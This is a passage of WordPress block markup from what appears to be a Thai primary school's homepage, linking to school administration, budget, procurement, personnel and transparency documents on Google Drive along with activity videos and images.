data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" 